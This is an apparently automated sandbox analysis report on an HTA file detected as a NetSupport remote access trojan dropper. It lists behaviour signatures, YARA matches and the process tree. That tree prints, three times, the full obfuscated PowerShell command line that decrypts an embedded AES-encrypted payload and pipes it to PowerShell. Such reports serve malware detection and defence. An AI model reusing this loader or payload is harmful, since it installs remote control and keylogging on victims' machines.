Windows Analysis Report: HDDREQ.hta
Overview
General Information
| Detection | NetSupport RAT |
|---|---|
| Score | 88 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Multi AV Scanner detection for dropped file
Very long command line found
Suspicious powershell command line found
Contains functionality to modify clipboard data
Suspicious command line found
Powershell drops PE file
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains capabilities to detect virtual machines
Potential key logger detected (key state polling based)
Enables security privileges
Found evaded block containing many API calls
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality to read data from the clipboard
Classification
- System is w10x64
- mshta.exe (PID: 2584, cmdline: mshta.exe "C:\Users\user\Desktop\HDDREQ.hta", MD5: 7083239CE743FDB68DFC933B7308E80A)
- powershell.exe (PID: 5768, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $qGppSLDk = 'AAAAAAAAAAAAAAAAAAAAAFwHZCiIDIGwYyDaYLolhJ1Pt0IGRRnuAO/zRzL0K1QTTf+sDo1IQgJNp/o6sak9ZJwAqT5085qLfqcMuFarB46AW9Q9Viyq55uwNca24icpseSVD+3Q6fTJT3ka3VGH22yZtYD2lS6XWg2gU7te/cbkvo4Na+GWInINoDr29PhIcwrC9TDlr4Sjve0v8Lsg270XKvCUWYdcCLnf8YQSywJBmKZK/HYwKsMbHRFZV137GG+JXtU978n/b8IQC80Q/205+pgWQOIF60tkifM7rmonzfTFrkGLURZSmN30w2bZS+HkQa2z9ai1Ev/QeK2Xs7UdlX8l9JwYChv+ag1Axnvx7Q/mPml4kjSPQwn821GxFcEB3mBCfE+ImaUPD7JnXdOZgc203+WcvXeeuK9+l4n2PcrCD++PnMGj+adauQCafjFgKSMsT6xZ3uw0cZr0hFnzm3k1VEGJVH4ihlRLIOIm5IgytcWp0hGyV48dm8rQ/CNekFQd8dvjLJ4wP3ZZTzF2CmPc4vWPWTL79M4jX0TCzzLuY/3RFXCLONuXTJHwoJkGAPPWQH84xXnmRiOgcG3H3QZ/Cro03Jknn2ndr+bhQa+duB2goyPu3I8vaFVZBAdsUjOmc0xv/Rh3mAT2W28jAsZkDwJCKaN9guxBUFSFg6oQKZLJEe1Hmd3Q6uw0IS1HU/PUoQ8H7CIsSN/VrWB2SPRVal9vC/W+xLaQfq1+aqMuNSWxP8K17k7ADHIdhJRw5UNUcC6sGSWsQhwsXdf9ndwHrThCklGE8XaPPm+J1IMGadoAqtQnvyb1H/5UOG+5aX3omC50JpRpyBDwDGDh7eL/5aMSKZGfSOxm1UTrHfD9GkXd1m+njZzO4Zoss/DEIsuqrMrHVcRgPXmAASJV7Q9WwHv9PIHbwX+jHpbfdJyB7LxbnHgH/05AVNLl7CDYazy4b8FjPsC7Hbb0PwH6aAppQ1mP0r02IZ06nc1vPabM7kJwEJydiFXe/Js9IfNHYXc7MAkJRC7jcY099xWPwTn/ujob8txEaVXy25HBAOqRG5x0Y1YhFaf7b2LjY5gqnah8Qf7j7RKy4DVplGiF5wbq+XiHz7fyZo7rD60MD0ViKI6ULosJi7DQKb94';$KUvTWF = 'QW5YelpzSkZNSUR5QmJaSWhKclhQYmxGaktXSFNmUnQ=';$gLNcAx = New-Object 'System.Security.Cryptography.AesManaged';$gLNcAx.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gLNcAx.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gLNcAx.BlockSize = 128;$gLNcAx.KeySize = 256;$gLNcAx.Key = [System.Convert]::FromBase64String($KUvTWF);$zYufe = [System.Convert]::FromBase64String($qGppSLDk);$OFmnPPfX = $zYufe[0..15];$gLNcAx.IV = $OFmnPPfX;$XCouRJYNg = $gLNcAx.CreateDecryptor();$mlgGXBLOM = $XCouRJYNg.TransformFinalBlock($zYufe, 16, $zYufe.Length - 16);$gLNcAx.Dispose();$kTBaD = New-Object System.IO.MemoryStream( , $mlgGXBLOM );$gfNHfA = New-Object System.IO.MemoryStream;$cnJAlwtiQ = New-Object System.IO.Compression.GzipStream $kTBaD, ([IO.Compression.CompressionMode]::Decompress);$cnJAlwtiQ.CopyTo( $gfNHfA );$cnJAlwtiQ.Close();$kTBaD.Close();[byte[]] $CNhTf = $gfNHfA.ToArray();$brUqr = [System.Text.Encoding]::UTF8.GetString($CNhTf);$brUqr | powershell - }, MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- conhost.exe (PID: 5756, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 4128, cmdline: "C:\Windows\system32\cmd.exe" /c powershell.exe $qGppSLDk = 'AAAAAAAAAAAAAAAAAAAAAFwHZCiIDIGwYyDaYLolhJ1Pt0IGRRnuAO/zRzL0K1QTTf+sDo1IQgJNp/o6sak9ZJwAqT5085qLfqcMuFarB46AW9Q9Viyq55uwNca24icpseSVD+3Q6fTJT3ka3VGH22yZtYD2lS6XWg2gU7te/cbkvo4Na+GWInINoDr29PhIcwrC9TDlr4Sjve0v8Lsg270XKvCUWYdcCLnf8YQSywJBmKZK/HYwKsMbHRFZV137GG+JXtU978n/b8IQC80Q/205+pgWQOIF60tkifM7rmonzfTFrkGLURZSmN30w2bZS+HkQa2z9ai1Ev/QeK2Xs7UdlX8l9JwYChv+ag1Axnvx7Q/mPml4kjSPQwn821GxFcEB3mBCfE+ImaUPD7JnXdOZgc203+WcvXeeuK9+l4n2PcrCD++PnMGj+adauQCafjFgKSMsT6xZ3uw0cZr0hFnzm3k1VEGJVH4ihlRLIOIm5IgytcWp0hGyV48dm8rQ/CNekFQd8dvjLJ4wP3ZZTzF2CmPc4vWPWTL79M4jX0TCzzLuY/3RFXCLONuXTJHwoJkGAPPWQH84xXnmRiOgcG3H3QZ/Cro03Jknn2ndr+bhQa+duB2goyPu3I8vaFVZBAdsUjOmc0xv/Rh3mAT2W28jAsZkDwJCKaN9guxBUFSFg6oQKZLJEe1Hmd3Q6uw0IS1HU/PUoQ8H7CIsSN/VrWB2SPRVal9vC/W+xLaQfq1+aqMuNSWxP8K17k7ADHIdhJRw5UNUcC6sGSWsQhwsXdf9ndwHrThCklGE8XaPPm+J1IMGadoAqtQnvyb1H/5UOG+5aX3omC50JpRpyBDwDGDh7eL/5aMSKZGfSOxm1UTrHfD9GkXd1m+njZzO4Zoss/DEIsuqrMrHVcRgPXmAASJV7Q9WwHv9PIHbwX+jHpbfdJyB7LxbnHgH/05AVNLl7CDYazy4b8FjPsC7Hbb0PwH6aAppQ1mP0r02IZ06nc1vPabM7kJwEJydiFXe/Js9IfNHYXc7MAkJRC7jcY099xWPwTn/ujob8txEaVXy25HBAOqRG5x0Y1YhFaf7b2LjY5gqnah8Qf7j7RKy4DVplGiF5wbq+XiHz7fyZo7rD60MD0ViKI6ULosJi7DQKb94';$KUvTWF = 'QW5YelpzSkZNSUR5QmJaSWhKclhQYmxGaktXSFNmUnQ=';$gLNcAx = New-Object 'System.Security.Cryptography.AesManaged';$gLNcAx.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gLNcAx.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gLNcAx.BlockSize = 128;$gLNcAx.KeySize = 256;$gLNcAx.Key = [System.Convert]::FromBase64String($KUvTWF);$zYufe = [System.Convert]::FromBase64String($qGppSLDk);$OFmnPPfX = $zYufe[0..15];$gLNcAx.IV = $OFmnPPfX;$XCouRJYNg = $gLNcAx.CreateDecryptor();$mlgGXBLOM = $XCouRJYNg.TransformFinalBlock($zYufe, 16, $zYufe.Length - 16);$gLNcAx.Dispose();$kTBaD = New-Object System.IO.MemoryStream( , $mlgGXBLOM );$gfNHfA = New-Object System.IO.MemoryStream;$cnJAlwtiQ = New-Object System.IO.Compression.GzipStream $kTBaD, ([IO.Compression.CompressionMode]::Decompress);$cnJAlwtiQ.CopyTo( $gfNHfA );$cnJAlwtiQ.Close();$kTBaD.Close();[byte[]] $CNhTf = $gfNHfA.ToArray();$brUqr = [System.Text.Encoding]::UTF8.GetString($CNhTf);$brUqr | powershell -, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3224, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 7104, cmdline: powershell.exe $qGppSLDk = 'AAAAAAAAAAAAAAAAAAAAAFwHZCiIDIGwYyDaYLolhJ1Pt0IGRRnuAO/zRzL0K1QTTf+sDo1IQgJNp/o6sak9ZJwAqT5085qLfqcMuFarB46AW9Q9Viyq55uwNca24icpseSVD+3Q6fTJT3ka3VGH22yZtYD2lS6XWg2gU7te/cbkvo4Na+GWInINoDr29PhIcwrC9TDlr4Sjve0v8Lsg270XKvCUWYdcCLnf8YQSywJBmKZK/HYwKsMbHRFZV137GG+JXtU978n/b8IQC80Q/205+pgWQOIF60tkifM7rmonzfTFrkGLURZSmN30w2bZS+HkQa2z9ai1Ev/QeK2Xs7UdlX8l9JwYChv+ag1Axnvx7Q/mPml4kjSPQwn821GxFcEB3mBCfE+ImaUPD7JnXdOZgc203+WcvXeeuK9+l4n2PcrCD++PnMGj+adauQCafjFgKSMsT6xZ3uw0cZr0hFnzm3k1VEGJVH4ihlRLIOIm5IgytcWp0hGyV48dm8rQ/CNekFQd8dvjLJ4wP3ZZTzF2CmPc4vWPWTL79M4jX0TCzzLuY/3RFXCLONuXTJHwoJkGAPPWQH84xXnmRiOgcG3H3QZ/Cro03Jknn2ndr+bhQa+duB2goyPu3I8vaFVZBAdsUjOmc0xv/Rh3mAT2W28jAsZkDwJCKaN9guxBUFSFg6oQKZLJEe1Hmd3Q6uw0IS1HU/PUoQ8H7CIsSN/VrWB2SPRVal9vC/W+xLaQfq1+aqMuNSWxP8K17k7ADHIdhJRw5UNUcC6sGSWsQhwsXdf9ndwHrThCklGE8XaPPm+J1IMGadoAqtQnvyb1H/5UOG+5aX3omC50JpRpyBDwDGDh7eL/5aMSKZGfSOxm1UTrHfD9GkXd1m+njZzO4Zoss/DEIsuqrMrHVcRgPXmAASJV7Q9WwHv9PIHbwX+jHpbfdJyB7LxbnHgH/05AVNLl7CDYazy4b8FjPsC7Hbb0PwH6aAppQ1mP0r02IZ06nc1vPabM7kJwEJydiFXe/Js9IfNHYXc7MAkJRC7jcY099xWPwTn/ujob8txEaVXy25HBAOqRG5x0Y1YhFaf7b2LjY5gqnah8Qf7j7RKy4DVplGiF5wbq+XiHz7fyZo7rD60MD0ViKI6ULosJi7DQKb94';$KUvTWF = 'QW5YelpzSkZNSUR5QmJaSWhKclhQYmxGaktXSFNmUnQ=';$gLNcAx = New-Object 'System.Security.Cryptography.AesManaged';$gLNcAx.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gLNcAx.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gLNcAx.BlockSize = 128;$gLNcAx.KeySize = 256;$gLNcAx.Key = [System.Convert]::FromBase64String($KUvTWF);$zYufe = [System.Convert]::FromBase64String($qGppSLDk);$OFmnPPfX = $zYufe[0..15];$gLNcAx.IV = $OFmnPPfX;$XCouRJYNg = $gLNcAx.CreateDecryptor();$mlgGXBLOM = $XCouRJYNg.TransformFinalBlock($zYufe, 16, $zYufe.Length - 16);$gLNcAx.Dispose();$kTBaD = New-Object System.IO.MemoryStream( , $mlgGXBLOM );$gfNHfA = New-Object System.IO.MemoryStream;$cnJAlwtiQ = New-Object System.IO.Compression.GzipStream $kTBaD, ([IO.Compression.CompressionMode]::Decompress);$cnJAlwtiQ.CopyTo( $gfNHfA );$cnJAlwtiQ.Close();$kTBaD.Close();[byte[]] $CNhTf = $gfNHfA.ToArray();$brUqr = [System.Text.Encoding]::UTF8.GetString($CNhTf);$brUqr, MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- powershell.exe (PID: 5744, cmdline: powershell -, MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- scmcss.exe (PID: 7420, cmdline: "C:\Users\user\AppData\Roaming\LocalEditor\scmcss.exe", MD5: 8D9709FF7D9C83BD376E01912C734F0A)
- scmcss.exe (PID: 7600, cmdline: C:\Users\user\AppData\Roaming\LocalEditor\scmcss.exe, MD5: 8D9709FF7D9C83BD376E01912C734F0A)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
Remote Access Functionality
| Source | Author |
|---|---|
| | Joe Security |
No Snort rule has matched
AV Detection
| Evidence | Entries |
|---|---|
| ReversingLabs | 2 |
| File opened | 1 |
| HTTPS traffic detected | 1 |
| Binary string | 8 |
| JA3 fingerprint | 1 |
| HTTP traffic detected | 3 |
| IP Address | 2 |
| Network traffic detected | 4 |
| TCP traffic detected without corresponding DNS query | 3 |
| String found in binary or memory | 37 |
| HTTP traffic detected | 1 |
| DNS traffic detected | 1 |
| HTTP traffic detected | 3 |
| HTTPS traffic detected | 1 |
Key, Mouse, Clipboard, Microphone and Screen Capturing
| Evidence | Detail |
|---|---|
| Code function | 8_2_1101F6B0 |
| Code function | 8_2_110076F0 |
| Binary or memory string | memstr_97bc5c44-9 |
| Code function | 8_2_11113880 |
| Code function | 9_2_11113880 |
| File source | 9 entries |
| Code function | 8_2_1101F6B0 |
System Summary
| Evidence | Detail |
|---|---|
| Matched rule | 3 entries |
| Process created | 6 entries |
| File created (dropped file) | 9 entries |
| Matched rule | 3 entries |
| Code function | 8_2_11029590, 8_2_11163220, 8_2_11167485, 8_2_1101B760, 8_2_1115E980, 8_2_1101C9C0, 8_2_110088AB, 8_2_1101BBA0, 9_2_11061C90, 9_2_11116220, 9_2_11163220, 9_2_11167485, 9_2_1101B760, 9_2_1115E980, 9_2_1101C9C0, 9_2_110088AB, 9_2_1101BBA0 |
| Code function | 8_2_1115DB40 |
| Code function | 8_2_1100A180 |
| Key opened | 1 entry |
| Section loaded | 7 entries |
| Process token adjusted | 1 entry |
| Dropped File | 1 entry |
| Key opened | 1 entry |
| Process created | 14 entries |
| Key value queried | 1 entry |
| File created | 1 entry |
| File created | 1 entry |
| Classification label | 1 entry |
| Code function | 8_2_11096970 |
| File read | 1 entry |
| Code function | 9_2_11059C50 |
| Section loaded | 3 entries |
| Mutant created | 2 entries |
| Code function | 8_2_11089150 |
| Anti Malware Scan Interface | 1 entry |